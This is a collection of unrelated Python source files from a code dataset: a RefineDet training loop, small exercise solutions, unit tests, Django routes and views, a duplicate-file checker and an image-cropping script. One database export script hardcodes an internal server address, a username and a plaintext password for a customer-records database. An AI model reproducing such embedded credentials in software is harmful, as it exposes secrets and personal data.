step_index = 0\n def train():\n global g_n_iter\n global step_index\n net.train()\n n_iter = 0\n sum_arm_loc_loss = 0\n sum_arm_cls_loss = 0\n sum_odm_loc_loss = 0\n sum_odm_cls_loss = 0\n for inputs, loc_targets, cls_targets in tqdm(trainloader, ncols=60, leave=False):\n if g_n_iter in cfg['lr_steps']:\n print(\"change lr\")\n step_index += 1\n adjust_learning_rate(optimizer, args.gamma, step_index)\n\n inputs = inputs.to(device)\n loc_targets = [target.to(device) for target in loc_targets]\n cls_targets = [target.to(device) for target in cls_targets]\n\n optimizer.zero_grad()\n preds = net(inputs)\n\n arm_loc_loss, arm_cls_loss = arm_criterion(preds, loc_targets, cls_targets)\n odm_loc_loss, odm_cls_loss = odm_criterion(preds, loc_targets, cls_targets)\n loss = arm_loc_loss + arm_cls_loss + odm_loc_loss + odm_cls_loss\n\n loss.backward()\n optimizer.step()\n\n n_iter = n_iter + 1\n g_n_iter = g_n_iter + 1\n sum_arm_loc_loss += arm_loc_loss.data.cpu().numpy()\n sum_arm_cls_loss += arm_cls_loss.data.cpu().numpy()\n sum_odm_loc_loss += odm_loc_loss.data.cpu().numpy()\n sum_odm_cls_loss += odm_cls_loss.data.cpu().numpy()\n #print(f\"{sum_arm_loc_loss:.3f},{sum_arm_cls_loss:.3f}, {sum_odm_loc_loss:.3f}, {sum_odm_cls_loss:.3f}\")\n sum_arm_loc_loss /= n_iter\n sum_arm_cls_loss /= n_iter\n sum_odm_loc_loss /= n_iter\n sum_odm_cls_loss /= n_iter\n return sum_arm_loc_loss, sum_arm_cls_loss, sum_odm_loc_loss, sum_odm_cls_loss\n\n def valid():\n net.eval()\n n_iter = 0\n sum_arm_loc_loss = 0\n sum_arm_cls_loss = 0\n sum_odm_loc_loss = 0\n sum_odm_cls_loss = 0\n for inputs, loc_targets, cls_targets in tqdm(validloader, ncols=60, leave=False):\n with torch.set_grad_enabled(False):\n inputs = inputs.to(device)\n loc_targets = [target.to(device) for target in loc_targets]\n cls_targets = [target.to(device) for target in cls_targets]\n\n preds = net(inputs)\n\n arm_loc_loss, arm_cls_loss = arm_criterion(preds, loc_targets, cls_targets)\n odm_loc_loss, odm_cls_loss = odm_criterion(preds, loc_targets, cls_targets)\n\n n_iter = n_iter + 1\n sum_arm_loc_loss += arm_loc_loss.data.cpu().numpy()\n sum_arm_cls_loss += arm_cls_loss.data.cpu().numpy()\n sum_odm_loc_loss += odm_loc_loss.data.cpu().numpy()\n sum_odm_cls_loss += odm_cls_loss.data.cpu().numpy()\n\n return sum_arm_loc_loss / n_iter, sum_arm_cls_loss / n_iter, sum_odm_loc_loss / n_iter, sum_odm_cls_loss / n_iter\n\n\n def save(epoch, casename):\n # Save checkpoint\n state = {\n 'epoch': epoch,\n 'net': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, f'./results/{casename}/{epoch}.pth')\n\n\n os.makedirs(f\"results/{casename}\", exist_ok=True)\n print(\"epoch\\tphase\\tarm_loc_loss\\tarm_cls_loss\\todm_loc_loss\\todm_cls_loss\\telapse_time\")\n for epoch in range(start_epoch, start_epoch+args.epoch):\n start_time = time.time()\n log = {\"epoch\":epoch}\n arm_loc_loss, arm_cls_loss, odm_loc_loss, odm_cls_loss = train()\n log[\"train/arm_loc_loss\"] = arm_loc_loss\n log[\"train/arm_cls_loss\"] = arm_cls_loss\n log[\"train/odm_loc_loss\"] = odm_loc_loss\n log[\"train/odm_cls_loss\"] = odm_cls_loss\n print(f'{epoch}, train, {arm_loc_loss:.6f}, {arm_cls_loss:.6f}, {odm_loc_loss:.6f}, {odm_cls_loss:.6f}, {time.time() - start_time:.2f}')\n arm_loc_loss, arm_cls_loss, odm_loc_loss, odm_cls_loss = valid()\n log[\"valid/arm_loc_loss\"] = arm_loc_loss\n log[\"valid/arm_cls_loss\"] = arm_cls_loss\n log[\"valid/odm_loc_loss\"] = odm_loc_loss\n log[\"valid/odm_cls_loss\"] = odm_cls_loss\n print(f'{epoch}, valid, {arm_loc_loss:.6f}, {arm_cls_loss:.6f}, {odm_loc_loss:.6f}, {odm_cls_loss:.6f}, {time.time() - start_time:.2f}')\n log['elapse_time'] = time.time() - start_time\n logs.append(log)\n with open(f\"results/{casename}/log\", \"w\") as f:\n json.dump(logs, f, indent=4)\n save(epoch, casename)\n print('------------------------------------')\n\n\ndef adjust_learning_rate(optimizer, gamma, step):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 at every\n specified step\n # Adapted from PyTorch Imagenet example:\n # https://github.com/pytorch/examples/blob/master/imagenet/main.py\n \"\"\"\n lr = args.lr * (gamma ** (step))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef xavier(param):\n init.xavier_uniform_(param)\n\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n elif isinstance(m, nn.ConvTranspose2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"train_refinedet.py","file_name":"train_refinedet.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125012962","text":"# https://www.urionlinejudge.com.br/judge/pt/problems/view/1197\n\n# -*- coding: utf-8 -*-\n\nwhile True:\n try:\n\n v, t = list(map(int, input().split()))\n t *= 2\n deslocamento = v * t\n print(deslocamento)\n\n except EOFError:\n break","sub_path":"Python3/Matemática/1197 - Volta à Faculdade de Física.py","file_name":"1197 - Volta à Faculdade de Física.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"491302634","text":"from decimal import Decimal, InvalidOperation\n\n\nif __name__ == '__main__':\n try:\n total = Decimal(input('Enter the purchase total: '))\n given = Decimal(input('How much are you paying with? '))\n except InvalidOperation:\n print('Invalid input!')\n exit(2)\n\n change = given - total\n\n denominations = {\n 'hundreds': 100.0,\n 'fifties': 50.0,\n 'twenties': 20.0,\n 'tens': 10.0,\n 'fives': 5.0,\n 'ones': 1.0,\n 'quarters': 0.25,\n 'dimes': 0.10,\n 'nickels': 0.05,\n 'pennies': 0.01,\n }\n results = {}\n remaining_change = change\n\n for denomination, value in denominations.items():\n #print(f'{denomination} = ${value}')\n results[denomination] = int(remaining_change / Decimal(value))\n # Determine how much to remove from our change. Multiply the\n # result by the denomination value.\n counted = int(results[denomination] * value)\n remaining_change = remaining_change - counted\n print(counted)\n\n print('Change Calculator')\n print('-----------------')\n print(f' For a purchase totalling ${total} and')\n print(f' the amount given to pay of ${given}, the')\n print(f' change would be ${change}. Which can be')\n print(f' broken down as:\\n')\n\n for denomination, number in results.items():\n print(f' - {number} {denomination}')\n\n # Loop over results\n","sub_path":"numbers/change_calc.py","file_name":"change_calc.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"623312224","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: xl\n\nextract and merge full-data raw data ETL\n\"\"\"\nimport sys\nimport pymssql\nimport os\nimport csv\nimport datetime\n\n\nclass MsSQL:\n def __init__(self, host, user, password, database, charset):\n self.host = host\n self.user = user\n self.password = password\n self.database = database\n self.charset = charset\n self.db = None\n self.curs = None\n\n def connect(self):\n try:\n self.db = pymssql.connect(\n host=self.host,\n user=self.user,\n password=self.password,\n database=self.database,\n charset=self.charset\n )\n self.curs = self.db.cursor()\n print(\"成功连接mssql数据库!\")\n except:\n print(\"连接数据库不成功\")\n # exit(0)\n\n def close(self):\n self.curs.close()\n self.db.close()\n\n def read(self, sql, params):\n self.connect()\n try:\n if params == None:\n self.curs.execute(sql)\n else:\n self.curs.execute(sql, params)\n print(\"读取数据成功!\")\n\n rows = self.curs.fetchall()\n description = self.curs.description\n return rows, description\n\n except Exception as e:\n # 发生错误滚回\n print('读取数据失败')\n print(repr(e))\n self.db.rollback()\n finally:\n self.close()\n\n\ndef sql2csv(rows, description, output_path):\n with open(os.path.abspath(output_path), 'w+', newline='', encoding='utf-8') as tb_output:\n writer = csv.writer(tb_output)\n # 添加csv表头\n writer.writerow([i[0] for i in description])\n for row in rows:\n writer.writerow(row)\n tb_output.close()\n\n\nif __name__ == '__main__':\n # 需要三个参数 分别是全量数据的结束时间,时间窗口大小,文件存放路径(到最后一级目录)\n # 例如 2018-02-01 3 C:/TeraData\n # print(len(sys.argv))\n # for i in range(0, len(sys.argv)):\n # print(sys.argv[i])\n if len(sys.argv) != 4:\n raise ValueError(\"arguments problem, please check!\")\n\n end_time = sys.argv[1]\n time_window = int(sys.argv[2])\n output_directory = sys.argv[3]\n\n # start_time = \"2018-01-01\"\n end_time_array = end_time.split(\"-\")\n end_year = int(end_time_array[0])\n end_month = int(end_time_array[1])\n end_day = int(end_time_array[2])\n time = datetime.date(end_year, end_month, end_day)\n\n select_sql = \"select lefttable.*,cardinfor.compno, cardpsninfor.compname,cardpsninfor.identifyno,\" \\\n \"cardpsninfor.knowledge,cardpsninfor.province,cardpsninfor.cardnum,\" \\\n \"cardpsninfor.telphno1,cardpsninfor.telphno2,cardpsninfor.compaddrs from \" \\\n \"(select nodeno,cardno,oilno,opetime,litter,amount,balance from oildetail \" \\\n \"where convert(varchar,mssql_time,23) = %s and oilno not in ('60000288','60000291','60000292') and nodeno like '32%') as lefttable \" \\\n \"left join cardinfor on lefttable.cardno = cardinfor.cardno \" \\\n \"inner join cardpsninfor on cardinfor.compno = cardpsninfor.compno \" \\\n \"order by opetime asc\"\n\n db = MsSQL('10.182.5.217', 'tr', '1qaz@WSX', 'OILCARD_DB','utf8')\n for day in range(time_window):\n end_time = (time + datetime.timedelta(days=-day)).isoformat()\n output_path = output_directory + \"/alldata_\" + end_time + \".csv\"\n print('开始操作 %s 数据'%end_time)\n rows, description = db.read(select_sql, end_time)\n sql2csv(rows, description, output_path)\n print('结束操作 %s 数据'%end_time)\n","sub_path":"oil/MergeFullDataSQL.py","file_name":"MergeFullDataSQL.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18299952","text":"#!/usr/bin/python3\n\"\"\"\nTests for Base Class\n\"\"\"\nimport unittest\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\n\nclass test_base(unittest.TestCase):\n \"\"\" Test Base methods \"\"\"\n def setUp(self):\n \"\"\" Imports module, instantiates class \"\"\"\n Base._Base__nb_objects = 0\n\n def tearDown(self):\n \"\"\" Cleans up after each test \"\"\"\n pass\n\n def test_nb_objects_private(self):\n \"\"\" Tests if nb_objects is a private class attribute \"\"\"\n self.assertTrue(hasattr(Base, \"_Base__nb_objects\"))\n\n def test_nb_objects_initialized(self):\n \"\"\" Tests if nb_objects initializes to zero \"\"\"\n self.assertEqual(Base._Base__nb_objects, 0)\n\n def test_instantiation(self):\n \"\"\" Tests instantiation \"\"\"\n b = Base(1)\n self.assertEqual(str(type(b)), \"\")\n self.assertEqual(b.__dict__, {\"id\": 1})\n self.assertEqual(b.id, 1)\n\n def test_constructor(self):\n \"\"\" Tests constructor \"\"\"\n with self.assertRaises(TypeError) as e:\n Base.__init__()\n msg = \"__init__() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), msg)\n\n def test_constructor_args(self):\n with self.assertRaises(TypeError) as e:\n Base.__init__(self, 1, 2)\n msg = \"__init__() takes from 1 to 2 positional arguments but 3 \\\nwere given\"\n self.assertEqual(str(e.exception), msg)\n\n def test_consecutive_ids(self):\n \"\"\" Tests id consecutively \"\"\"\n b1 = Base()\n b2 = Base()\n self.assertEqual(b1.id + 1, b2.id)\n\n def test_id_synced(self):\n \"\"\" Tests sync between class and instance id \"\"\"\n b = Base()\n self.assertEqual(getattr(Base, \"_Base__nb_objects\"), b.id)\n\n def test_custom_id_int(self):\n \"\"\" Tests custom id \"\"\"\n i = 98\n b = Base(i)\n self.assertEqual(b.id, i)\n\n def test_custom_id_str(self):\n i = \"Tabitha\"\n b = Base(i)\n self.assertEqual(b.id, i)\n\n def test_id_keyword(self):\n \"\"\" Tests id passed as kwarg \"\"\"\n i = 98\n b = Base(id=i)\n self.assertEqual(b.id, i)\n\n # -- #15 -- #\n def test_to_json_string(self):\n \"\"\" Tests to_json_string() \"\"\"\n with self.assertRaises(TypeError) as e:\n Base.to_json_string()\n s = \"to_json_string() missing 1 required positional argument: \\\n'list_dictionaries'\"\n self.assertEqual(str(e.exception), s)\n\n self.assertEqual(Base.to_json_string(None), \"[]\")\n self.assertEqual(Base.to_json_string([]), \"[]\")\n d = [{'x': 5, 'y': 5, 'width': 4, 'id': 12, 'height': 3}]\n self.assertEqual(len(Base.to_json_string(d)), len(str(d)))\n d = [{\"Tabitha\": 98}]\n self.assertEqual(Base.to_json_string(d), '[{\"Tabitha\": 98}]')\n d = [{\"Tabitha\": 98}, {\"cat\": 5}, {\"HI\": 0}]\n self.assertEqual(Base.to_json_string(d),\n '[{\"Tabitha\": 98}, {\"cat\": 5}, {\"HI\": 0}]')\n d = [{}]\n self.assertEqual(Base.to_json_string(d), '[{}]')\n d = [{}, {}]\n self.assertEqual(Base.to_json_string(d), '[{}, {}]')\n\n r1 = Rectangle(1, 2, 3, 4)\n dictionary = r1.to_dictionary()\n json_dict = Base.to_json_string([dictionary])\n dictionary = str([dictionary])\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dict)\n\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(1, 2, 3, 4)\n r3 = Rectangle(2, 3, 4, 5)\n dictionary = [r1.to_dictionary(), r2.to_dictionary(),\n r3.to_dictionary()]\n json_dictionary = Base.to_json_string(dictionary)\n dictionary = str(dictionary)\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n r1 = Square(10, 7, 2)\n dictionary = r1.to_dictionary()\n json_dictionary = Base.to_json_string([dictionary])\n dictionary = str([dictionary])\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n r1 = Square(10, 7, 2)\n r2 = Square(1, 2, 3)\n r3 = Square(2, 3, 4)\n dictionary = [r1.to_dictionary(), r2.to_dictionary(),\n r3.to_dictionary()]\n json_dictionary = Base.to_json_string(dictionary)\n dictionary = str(dictionary)\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n # -- #16 -- #\n def test_save_to_file(self):\n \"\"\" Tests save_to_file method \"\"\"\n import os\n r1 = Rectangle(15, 4, 3, 2)\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r1, r2])\n\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 105)\n\n Rectangle.save_to_file(None)\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n try:\n os.remove(\"Rectangle.json\")\n except:\n pass\n Rectangle.save_to_file([])\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r2])\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 52)\n\n Square.save_to_file(None)\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n try:\n os.remove(\"Square.json\")\n except:\n pass\n Square.save_to_file([])\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n r2 = Square(1)\n Square.save_to_file([r2])\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 38)\n\n # -- #17 -- #\n\n def test_create(self):\n '''Tests create() method.'''\n r1 = Rectangle(3, 5, 1)\n r1_dictionary = r1.to_dictionary()\n r2 = Rectangle.create(**r1_dictionary)\n self.assertEqual(str(r1), str(r2))\n self.assertFalse(r1 is r2)\n self.assertFalse(r1 == r2)\n\n # -- 17 -- #\n def test_load_from_file(self):\n '''Tests load_from_file() method.'''\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(2, 4)\n list_in = [r1, r2]\n Rectangle.save_to_file(list_in)\n list_out = Rectangle.load_from_file()\n self.assertNotEqual(id(list_in[0]), id(list_out[0]))\n self.assertEqual(str(list_in[0]), str(list_out[0]))\n self.assertNotEqual(id(list_in[1]), id(list_out[1]))\n self.assertEqual(str(list_in[1]), str(list_out[1]))\n\n s1 = Square(5)\n s2 = Square(7, 9, 1)\n list_in = [s1, s2]\n Square.save_to_file(list_in)\n list_out = Square.load_from_file()\n self.assertNotEqual(id(list_in[0]), id(list_out[0]))\n self.assertEqual(str(list_in[0]), str(list_out[0]))\n self.assertNotEqual(id(list_in[1]), id(list_out[1]))\n self.assertEqual(str(list_in[1]), str(list_out[1]))\n\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468809160","text":"from django.urls import path\nfrom . import views\n\napp_name = 'movies'\n\nurlpatterns = [\n path('', views.index),\n path('top10/', views.top10),\n path('/', views.recommended),\n path('detail//', views.detail),\n path('hashtag//', views.get_movies),\n path('hashtags//', views.hashtags),\n path('genres/', views.get_genres),\n path('genre//', views.genre),\n path('/like/', views.like),\n path('/reviews/', views.get_reviews),\n path('/review/', views.review),\n path('sorts/', views.sorts),\n path('sort///', views.sort)\n]\n","sub_path":"movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"23399057","text":"import h5py\nimport numpy as np\nhdf5_path = 'D:\\ImageProcessingPythonScripts\\Training\\Evaluator\\ValidationSets3\\ValidationSet03_DualBlur1.hdf5'\nhdf5_file = h5py.File(hdf5_path, \"r\")\n\ndata_num = hdf5_file[\"val_int_img\"].shape[0]\nprint(data_num)\nfrom random import shuffle\nfrom math import ceil\nimport matplotlib.pyplot as plt\n\nbatch_size = 1\nbatches_list = list(range(int(ceil(float(data_num) / batch_size))))\nshuffle(batches_list)\nfor n, i in enumerate(batches_list):\n i_s = i * batch_size # index of the first image in this batch\n i_e = min([(i + 1) * batch_size, data_num])\n images_ext = hdf5_file[\"val_ext_img\"][i_s:i_e, ...]\n images_int = hdf5_file[\"val_int_img\"][i_s:i_e, ...]\n labels = hdf5_file[\"val_labels\"][i_s:i_e, ...]\n names = hdf5_file[\"val_names\"][i_s:i_e, ...]\n print(labels[0])\n print(names[0])\n plt.imshow(images_int[0])\n plt.show()\n plt.imshow(images_ext[0])\n plt.show()\n","sub_path":"ImageCropping_DatabaseCreation/hdf5_read.py","file_name":"hdf5_read.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27335793","text":"# Create your views here.\nfrom datetime import datetime\nfrom functools import reduce\n\nfrom django.http import HttpResponse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom gateway.models import API\n\n\nclass MainGatewayView(APIView):\n\n def redirect(self, request):\n paths = request.path.split('/')\n if len(paths) < 2 or paths[1] != \"api\":\n raise ValidationError('incorrect path format')\n api = API.objects.filter(name=paths[2])\n if api.count() != 1:\n raise ValidationError('multiple api found for this service name')\n api = api[0]\n if api.failure_strike >= 3:\n now = datetime.now()\n if (api.recent_failure_time - now).total_seconds() < 30:\n return Response('service unavailable', status=503)\n api.failure_strike = 0\n api.save()\n print(paths, reduce(lambda a, b: f'{str(a)}/{str(b)}', paths[3:]))\n\n res = api.send_request(request, reduce(lambda a, b: f'{str(a)}/{str(b)}', paths[3:]))\n if res == -1:\n return Response('service unavailable', status=503)\n if res.headers.get('Content-Type', '').lower() == 'application/json':\n data = res.json()\n else:\n data = res.content\n return Response(data, status=res.status_code)\n\n def get(self, request):\n return self.redirect(request)\n\n def post(self, request):\n return self.redirect(request)\n\n def put(self, request):\n return self.redirect(request)\n","sub_path":"gateway/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238982340","text":"import hashlib\nimport os\nimport stat\nfrom queue import Queue\nfrom threading import RLock, Thread\n\n\ndef clean_path(path):\n if not os.path.exists(path):\n raise FileNotFoundError(\"{} not found\".format(path))\n path = os.path.expanduser(path)\n path = os.path.normpath(path)\n path = os.path.abspath(path)\n return path\n\n\nclass DupeChecker(object):\n\n def __init__(self, dirname, hash_type=\"md5\", num_threads=1):\n self.queue = Queue()\n self.lock = RLock()\n dirname = clean_path(dirname)\n self._queue_dir(dirname)\n self.hasher = self._get_hasher(hash_type)\n self.num_threads = num_threads\n self.duplicates = set()\n self.checksums = {}\n\n def detect_duplicates(self):\n \"\"\"Start multiple threads which extract files to check from a queue,\n to avoid the same file being handled by multiple threads.\n \"\"\"\n for _ in range(self.num_threads):\n t = Thread(target=self._work_queue)\n t.start()\n self.queue.join()\n\n def formatted_duplicates(self):\n return \"\\n\".join(\"{}: {}\".format(h, \", \".join(self.checksums[h]))\n for h in self.duplicates)\n\n def get_duplicates(self):\n self.detect_duplicates()\n return self.formatted_duplicates()\n\n def check_file(self, fname):\n \"\"\"Check if a file is duplicate and mark the fact accordingly.\n Since the file data (checksums and duplicates) can be accessed\n concurrently by multiple threads, a simple lock is used when\n updating those members.\n \"\"\"\n s = self._checksum(fname)\n self.lock.acquire()\n try:\n if s in self.checksums:\n self.duplicates.add(s)\n self.checksums[s].add(fname)\n else:\n self.checksums[s] = {fname}\n finally:\n self.lock.release()\n\n def _queue_dir(self, dirname):\n \"\"\"Enqueue all regular files within a directory.\n This method also recurses on subdirectories.\n \"\"\"\n root = os.path.abspath(dirname)\n for name in os.listdir(dirname):\n fname = os.path.join(root, name)\n mode = os.stat(fname).st_mode\n if stat.S_ISREG(mode):\n self.queue.put(fname)\n elif stat.S_ISDIR(mode):\n self._queue_dir(fname)\n\n def _work_queue(self):\n while not self.queue.empty():\n fname = self.queue.get()\n self.check_file(fname)\n self.queue.task_done()\n\n def _get_hasher(self, hname):\n if hname == 'md5':\n return hashlib.md5\n elif hname == 'sha1':\n return hashlib.sha1\n elif hname == 'sha256':\n return hashlib.sha256\n else:\n raise ValueError(\"{} hashing is not supported.\".format(hname))\n\n def _checksum(self, fname):\n \"\"\"Compute the checksum of a file by reading it in chunks,\n to avoid loading large files in memory.\n \"\"\"\n hasher = self.hasher()\n with open(fname, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b\"\"):\n hasher.update(chunk)\n return hasher.hexdigest()\n","sub_path":"dupefinder/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141064035","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 15 17:03:23 2020\r\n\r\n@author: us51114\r\ncrop the image\r\n\"\"\"\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef find_the_diff_corner(img,x_dim,y_dim,str_inp):\r\n if str_inp=='top':\r\n start_i=0;stop_i=x_dim;step_i=1\r\n start_j=0;stop_j=y_dim;step_j=1\r\n addin=-1\r\n x_var='i';y_var='j'\r\n elif str_inp=='bottom':\r\n start_i=x_dim-1;stop_i=-1;step_i=-1\r\n start_j=0;stop_j=y_dim-1;step_j=1\r\n addin=1\r\n x_var='i';y_var='j'\r\n elif str_inp=='left':\r\n start_i=0;stop_i=y_dim-1;step_i=1\r\n start_j=0;stop_j=x_dim-1;step_j=1\r\n addin=1\r\n x_var='j';y_var='i'\r\n elif str_inp=='right':\r\n start_i=y_dim-1;stop_i=-1;step_i=-1\r\n start_j=0;stop_j=x_dim-1;step_j=1\r\n addin=-1\r\n x_var='j';y_var='i'\r\n # print(start_i,\":\",stop_i,\":\",step_i)\r\n # print(start_j,\":\",stop_j,\":\",step_j)\r\n find_val=img[0,0]\r\n # print(\"find_val=\",type(find_val))\r\n for i in range(start_i,stop_i,step_i):\r\n # for j in range(start_j,stop_j,step_j):\r\n # print(type(img[eval(x_var),eval(y_var)]))\r\n if x_var=='i':\r\n cur_val=img[eval(x_var),:]\r\n else:\r\n cur_val=img[:,eval(y_var)]\r\n # cur_val=img[eval(x_var),eval(y_var)]\r\n comparison = find_val == cur_val \r\n equal_arrays = comparison.all() \r\n if ~equal_arrays:\r\n # print('find_val:',find_val,',cur_val:',cur_val)\r\n index_found=i+addin\r\n # print('index_found:',index_found,'i:',i)\r\n return index_found\r\n \r\ndef add_border(img,start_i,stop_i,cont_j,var_axis):\r\n if var_axis=='x':\r\n x_var='i';y_var='j'\r\n else:\r\n x_var='j';y_var='i'\r\n set_color=np.array([0,0,255]) #red [blue,green,red]\r\n for i in range(start_i,stop_i+1,1):\r\n # for j in range(start_j,stop_j,step_j):\r\n j=cont_j\r\n img[eval(x_var),eval(y_var)]=set_color\r\n\r\n\r\n#import image\r\n# img=cv2.imread('D:\\\\kalathi\\\\My_collection\\\\Python\\\\Auto_Crop_image\\\\Picture.jpg')\r\nimg=cv2.imread('Input_Image.jpg')\r\n#print(img.shape)\r\n#print(img[0,0])\r\nx=img.shape[0]\r\n# print(x)\r\ny=img.shape[1]\r\ntop_loc=find_the_diff_corner(img,x,y,'top')\r\n#print('top_loc=',top_loc)\r\nbot_loc=find_the_diff_corner(img,x,y,'bottom')\r\nleft_loc=find_the_diff_corner(img,x,y,'left')\r\nright_loc=find_the_diff_corner(img,x,y,'right')\r\n#print('top_loc=',top_loc,'bot_loc=',bot_loc,'left_loc=',left_loc,'right_loc=',right_loc)\r\n\r\n#below to create the red border to image\r\n# ka=add_border(img,left_loc,right_loc,top_loc,'y') #'top line'\r\n# ka=add_border(img,left_loc,right_loc,bot_loc,'y') #'bottom line'\r\n# ka=add_border(img,top_loc,bot_loc,left_loc,'x') #'left line'\r\n# ka=add_border(img,top_loc,bot_loc,right_loc,'x') #'right line'\r\n# cv2.imshow('image',img)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\ncrop_img=img[top_loc:bot_loc+1,left_loc:right_loc+1]\r\nka=cv2.imwrite('Output_Image.jpg',crop_img)\r\n","sub_path":"Auto_Crop_image.py","file_name":"Auto_Crop_image.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309458540","text":"'''\nIn this kata, you've to count lowercase letters in a given string and return the letter count in a hash with 'letter' as key and count as 'value'. The key must be 'symbol' instead of string in Ruby and 'char' instead of string in Crystal.\n\nExample:\n\nletter_count('arithmetics') #=> {\"a\": 1, \"c\": 1, \"e\": 1, \"h\": 1, \"i\": 2, \"m\": 1, \"r\": 1, \"s\": 1, \"t\": 2}\n'''\n\n\ndef letter_count(s):\n result = {}\n for c in s:\n if result.get(c,0) == 0:\n result[c] = 1\n else: \n result[c] = result[c] +1\n return result\ndef main(): \n print(letter_count(\"codewars\"))\n \nmain()","sub_path":"Count letters in string/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242995457","text":"# coding=utf-8\n\"\"\"\nUseful mixins for forms\n\"\"\"\nfrom django.forms import formset_factory, BaseFormSet, BaseForm\nfrom django.forms.formsets import TOTAL_FORM_COUNT\nfrom django.utils.datastructures import MultiValueDict\n\n__author__ = 'Ilya.Kazakevich'\n\n\nclass ValidateOnlyChangedFormMixin:\n \"\"\"\n Validates some values if only they were changed\n \"\"\"\n changed_fields_validators = dict()\n \"\"\"\n dict \"field_name\": validator\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field, validator in self.__class__.changed_fields_validators.items():\n def _validator(value):\n if field in self.changed_data:\n validator(value)\n\n if field in self.fields: # No need to add validator if field does not exist\n self.fields[field].validators.append(_validator)\n\n\ndef multiply_files_in_formset(file_fields, form, main_files, main_data, prefix=None):\n \"\"\"\n This tool helps you to support multiple file uploads. You create formset with form that has only file field.\n This file field should have ``multiple`` attribute.\n In your formset, you call this function in ``init`` *before* real ``init`` passing ``files`` and ``data``\n to it. It will duplicate form creating a new form for each file (like the client would do).\n So, from Formset point of view, it will work like if client simply added new form.\n Management form is fixed as well\n :param file_fields: fields with file\n :type file_fields list of str\n :param form: model form to be used to parse\n :type form django.forms.models.ModelForm\n :param main_files: ``files`` from request (probably from ``**kwargs['files']``)\n :type main_files dict\n :param main_data: ``data`` from request (probably from ``**kwargs['data']``)\n :type main_data dict\n :param prefix: formset with files prefix\n :type prefix dict\n \"\"\"\n formset = formset_factory(form)(data=main_data, files=main_files, prefix=prefix)\n assert isinstance(formset, BaseFormSet)\n form_count = int(formset.total_form_count())\n for form_id, real_form in enumerate(formset.forms):\n for file_field in file_fields:\n assert isinstance(real_form, BaseForm)\n prefix = real_form.prefix\n try:\n files = real_form.files.getlist(\"{0}-{1}\".format(prefix, file_field))\n except AttributeError:\n continue # In case of no such attribute there is simple dict\n if len(files) < 2:\n continue\n for new_file in files[1:]: # Copy all other files except the first one that is already there\n # Only copy fields for this form\n for field_name, field_val in [(k, v) for (k, v) in real_form.data.items() if\n str(k).startswith(prefix)]:\n # Use new form id instead of old one\n new_field_name = str(field_name).replace(\"-{}-\".format(form_id), \"-{}-\".format(form_count))\n main_data[new_field_name] = field_val\n new_file_name = formset.prefix + \"-\" + str(form_count) + 